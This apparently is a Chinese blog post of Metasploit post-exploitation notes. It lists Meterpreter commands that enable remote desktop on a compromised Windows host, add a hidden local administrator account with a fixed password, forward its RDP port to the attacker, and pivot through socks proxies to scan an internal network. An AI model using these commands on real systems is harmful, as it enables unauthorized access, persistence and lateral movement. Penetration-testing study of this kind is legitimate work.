metasploit进阶2

最新推荐文章于 2024-04-29 16:05:42 发布
最新推荐文章于 2024-04-29 16:05:42 发布
阅读量476 收藏 1
点赞数
分类专栏: # msf 内网 # 红队技巧 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123186662
版权
内网 同时被 3 个专栏收录
36 篇文章 2 订阅
订阅专栏
红队技巧
25 篇文章 2 订阅
订阅专栏
msf
4 篇文章 0 订阅
订阅专栏

拿到shell 开启远程终端

开启远程终端 添加账号

getgui 模块——开启远程桌面

run getgui -e #开启目标主机远程桌面

run post/windows/manage/enable_rdp 
run getgui -u myqf -p QWEasd123 添加本地管理员

在这里插入图片描述

转发端口

如果服务器防火墙开启的情况下,有可能拦截远程终端端口,使用命令把远程端口3389转发出来

Usage: portfwd [-h] [add | delete | list | flush] [args]

转发3389端口

命令:

portfwd add -l 1234 -p 3389 -r 受害者主机 
rdesktop 127.0.0.1:1234

在这里插入图片描述
如果不能连接:
参考:https://zhuanlan.zhihu.com/p/371497627

在这里插入图片描述

跨路由访问

参考:内网渗透 psexec

kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做跳板访问目标主机

socks 相关设置:

setg Proxies socks4a/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置) 
setg Proxies socks5:192.168.0.189:1080 
set ReverseAllowProxy true #允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)

忘记输该命令,run 运行好像也会提示没有输入该命令

利用:

proxychains4 nmap 10.10.10.144 -sT -A -p 445
明月清风~~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5681
meterpreter使用攻略(持续更新中)
Meterpreter(后渗透命令)笔记
5L2g556F5ZWl77yf
02-17 1928
Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。 Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。 background命令 如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。 se...
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3898
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
meterpreter运行run getgui -e报错
最新发布
xiaolan458的专栏
04-29 274
meterpreter运行run getgui -e报错
Meterpreter命令详解
weixin_45605352的博客
04-18 4971
0x01初识Meterpreter 1.1.什么是Meterpreter    Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按
内网渗透之跨路由访问
qq_56426046的博客
11-16 1327
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网, 如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做 跳板访问目标主机 获取内网网卡命令。msf使用隧道模块 默认是使用socks5 也可以选择socks4a。绑定路由 不绑定路由就没法访问目标主机。使用代理隧道nmap扫描内网主机。末将于禁,愿为曹家世代赴汤蹈火。msf 使用代理访问目标。
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
2. **信息收集** 在渗透测试的初始阶段,信息收集是至关重要的。Metasploit提供各种扫描工具,如`nmap`,用于识别网络上的活跃主机和开放端口。此外,还可以获取目标系统和服务的版本信息,这有助于确定可能的漏洞...
metasploit教程
11-16
Metasploit教程》是一本深入浅出地介绍Metasploit框架的专业教材,适用于网络安全、渗透测试领域的初学者和进阶者。Metasploit作为全球范围内广泛应用的安全评估工具,其功能强大,涵盖漏洞扫描、漏洞利用、后门...
metasploit的使用
11-05
- **metasploit_he_pentration_tester's_guide.pdf**: 可能是Metasploit渗透测试者的指南,涵盖从基础到进阶Metasploit使用方法。 - **Packtpub.Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf**: 这本...
一份详细的 Metasploit Framework资料
01-04
三、Metasploit Framework的进阶应用 1. 自定义模块:除了使用内置模块,高级用户还可以编写自定义模块,扩展MSF的功能。 2. 情报收集:结合其他信息收集工具,如Nmap,可以进行更全面的侦查工作。 3. 隐藏与反...
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
* Metasploit进阶:包括Metasploit的高级使用、漏洞开发、渗透测试实践等。 本资源还提供了许多有用的链接和参考文献,包括PTES(Penetration Testing Execution Standard)、Kali Linux、Pen Testing Tools Cheat ...
内网渗透-隧道技术(socks转发、ssh隧道)
qq_44005305的博客
08-01 293
本片文章将会介绍在内网渗透中经常用到的隧道技术。
MSF搭建socks代理
谢公子的博客
05-01 7716
目录 搭建代理 添加路由 ​搭建Socks4a代理 搭建Socks5代理 连接代理 搭建代理 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...
Linux kali 安装socks5(ss5)代理
热门推荐
柳似烟的专栏
11-22 1万+
环境为VMWare虚拟机,kali linux系统。 由于公司网络对局域网内的机器进行了MAC绑定,kali无法自动获取IP地址,所以需要手动设置IP地址:10.0.0.203,VMWare的网络使用的是桥接的模式,但此时的kali是无法上网的(网关不给10.0.0.203网络传输),只能在内部网络发送数据。要是使用NAT模式使用共享主机的IP地址是可以联网的,但是由于某些其它目的的需要不想这样
Metasploit--后渗透--创建一个新账号
千寻的博客
02-18 3082
文章目录查看目标主机有哪些用户可以在目标系统中创建一个新的用户账号查看系统用户组将hack用户添加到管理员用户组。 查看目标主机有哪些用户 run post/windows/gather/enum_logged_on_users 可以在目标系统中创建一个新的用户账号 run getgui -u hack -p qwe 这个命令会创建用户,并把他添加到 Administrators 组中,这样该用户就拥有远程桌面的权限了。这里成功创建了用户,但是添加到Administrators组中失败了 ! 如果
系统漏洞利用过程
Kangjie_oo的博客
10-21 2905
系统漏洞利用过程 1.天镜、nessus、极光等扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具(这里我以天镜,扫描本机作为一个例子) 2.开msf 通过search搜漏洞编号或漏洞名称 (这里我有一个kali和一个Win7虚拟机) 注意:(实验针对漏洞,关掉防火墙!) ①msfconsole:进入msf控制台 ②search: 漏洞编号,例如ms17_010 (就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒) 3.搜到漏洞之后,用use 打开msf漏洞利用工具 use (
meterpreter会话渗透利用常用的32个命令归纳小结
至臻求学,胸怀云月
01-25 1832
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考
渗透测试——后渗透攻击
YT的博客
02-18 6234
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
开启目标远程桌面服务方法总结
Kevin's Blog
11-12 5049
文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面(推荐)2.5 更改远程桌面端口(附)三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面(推荐)3.1.1 优 / 缺点3.1.2 启动远程桌面前 前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启
Metasploit进阶用法
05-09
Metasploit是一款强大的渗透测试工具,以下是一些进阶用法: 1. 使用自定义Payload:Metasploit默认提供了一些Payload,但你也可以使用自己编写的Payload。可以使用msfvenom生成自定义Payload,并使用msfconsole进行连接和攻击。 2. 使用Exploit模块:Metasploit中有很多Exploit模块,可以使用这些模块来攻击漏洞。可以使用search命令搜索可用的Exploit模块,然后使用use命令选择要使用的模块。 3. 使用Post模块:Post模块可以在攻击成功后执行各种任务,例如收集密码、查找敏感信息等。可以使用search命令搜索可用的Post模块,然后使用use命令选择要使用的模块。 4. 使用Meterpreter会话:Meterpreter是Metasploit中的一种后门程序,可以在攻击成功后建立一个交互式Shell。可以使用sessions命令查看已建立的会话,然后使用session命令进入会话。 5. 使用模块的选项:每个模块都有一些选项,可以使用set命令设置这些选项。例如,可以设置RHOSTS选项指定要攻击的目标主机。 6. 自定义Exploit:如果你无法找到现有的Exploit模块来攻击目标,可以编写自己的Exploit。Metasploit提供了一个模板,可以使用这个模板来编写自己的Exploit。 7. 使用Metasploit Framework API:Metasploit Framework API可以在你的代码中使用Metasploit的功能。这使得你可以编写自己的脚本来使用Metasploit进行渗透测试。 总之,Metasploit是一个非常强大的工具,可以用于各种攻击和渗透测试场景。通过掌握以上进阶用法,你可以更好地利用Metasploit进行渗透测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值